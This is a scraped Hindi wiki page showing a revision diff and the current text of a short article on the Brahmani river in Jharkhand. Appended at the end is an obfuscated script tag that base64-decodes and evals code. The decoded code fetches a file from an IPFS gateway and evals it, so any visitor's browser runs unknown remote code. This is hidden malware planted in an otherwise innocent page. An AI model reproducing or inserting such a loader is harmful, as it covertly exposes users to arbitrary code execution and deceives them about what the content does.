Difference between revisions of "ब्राह्मणी नदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[दुमका ज़िला|दुमका ज़िले]] के उत्तर में स्थित दुधवा पहाड़ी से इस नदी का उदगम होता है।  
+
'''ब्राह्मणी नदी''' का उदगम [[दुमका ज़िला|दुमका ज़िले]] के उत्तर में स्थित दुधवा पहाड़ी से होता है।  
 
*यह दामिनी-ए-कोह में झिलीमिली और मोसनिया बंग्ला होते हुए बहती है।  
 
*यह दामिनी-ए-कोह में झिलीमिली और मोसनिया बंग्ला होते हुए बहती है।  
 
*यह दरिन मौलेश्वर के पास दुमका ज़िले को छोड़कर [[झारखण्ड]] से बाहर निकलती हुई नलहाती रेलवे स्टेशन के पास [[गंगा]] में मिल जाती है।  
 
*यह दरिन मौलेश्वर के पास दुमका ज़िले को छोड़कर [[झारखण्ड]] से बाहर निकलती हुई नलहाती रेलवे स्टेशन के पास [[गंगा]] में मिल जाती है।  
Line 5: Line 5:
  
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=  
|प्रारम्भिक=
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
 
|शोध=
 
|शोध=
 
}}
 
}}
==सम्बंधित लिंक==
+
==संबंधित लेख==
 +
{{झारखण्ड की नदियाँ}}
 
{{भारत की नदियाँ}}
 
{{भारत की नदियाँ}}
[[Category:झारखण्ड]][[Category:झारखण्ड की नदियाँ]][[Category:भारत की नदियाँ]]
+
[[Category:झारखण्ड]][[Category:झारखण्ड की नदियाँ]][[Category:भारत की नदियाँ]][[Category:भूगोल कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 09:43, 26 January 2012

brahmani nadi ka udagam dumaka zile ke uttar mean sthit dudhava paha di se hota hai.

  • yah damini-e-koh mean jhilimili aur mosaniya bangla hote hue bahati hai.
  • yah darin mauleshvar ke pas dumaka zile ko chho dakar jharakhand se bahar nikalati huee nalahati relave steshan ke pas ganga mean mil jati hai.
  • brahmani nadi ki pramukh sahayak nadiyoan mean gumaro aur ero haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>